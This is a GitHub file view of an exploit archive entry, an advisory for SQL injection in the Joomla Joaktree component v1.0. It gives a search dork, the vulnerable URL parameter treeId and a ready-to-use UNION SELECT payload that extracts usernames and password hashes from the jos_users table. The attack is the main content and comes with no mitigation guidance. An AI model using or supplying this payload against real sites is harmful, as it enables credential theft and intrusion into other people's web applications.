forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10057.txt
25 lines (15 loc) · 805 Bytes
/
10057.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Joomla Joaktree Component v1.0 SQL Injection Vulnerability
==========================================================
[ Software Information ]
[+] Developer : Niels van Dantzig
[+] Download : http://extensions.joomla.org/extensions/miscellaneous/genealogy/9842
[+] Version() : 1.0
[+] License: GNU General Public License (GPL)
[+] Vulnerability : SQL injection
[+] Dork : "R.I.P
===========================================================================
[ Here we go.. Proof of Concept ]
http://server/index.php?option=com_joaktree&view=joaktree&treeId=[INDONESIANCODER]
[ Exploit ]
-1+union+select+1,1,1,version(),1,666,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1+from+jos_users--
===========================================================================